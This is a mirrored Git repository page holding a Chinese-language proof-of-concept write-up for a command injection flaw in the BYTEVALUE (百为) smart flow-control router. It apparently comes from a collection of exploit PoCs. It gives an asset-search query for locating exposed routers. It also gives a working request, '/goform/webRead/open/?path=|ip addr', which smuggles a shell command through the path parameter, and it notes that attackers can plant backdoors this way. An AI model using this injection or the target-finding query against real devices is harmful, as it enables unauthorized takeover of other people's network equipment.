crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:54:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/百为智能流控路由器存在命令执行漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

27 lines
1.0 KiB
Markdown
Raw Permalink Blame History

# 百为智能流控路由器存在命令执行漏洞
# 一、漏洞简介
百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
# 二、影响版本
+ 百为智能流控路由器
# 三、资产测绘
+ hunter`app.name=="BYTEVALUE 百为流控 Router"`
+ 特征
![1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e.png](./img/GCwyGnZtM0ZUPa42/1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e-995996.png)
# 四、漏洞复现
```plain
/goform/webRead/open/?path=|ip addr
```
![1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2.png](./img/GCwyGnZtM0ZUPa42/1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2-499887.png)
![1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4.png](./img/GCwyGnZtM0ZUPa42/1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4-956103.png)
> 更新: 2024-02-29 23:57:13
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ig5lw85h3w0ygdfh>
Reference in New Issue View Git Blame Copy Permalink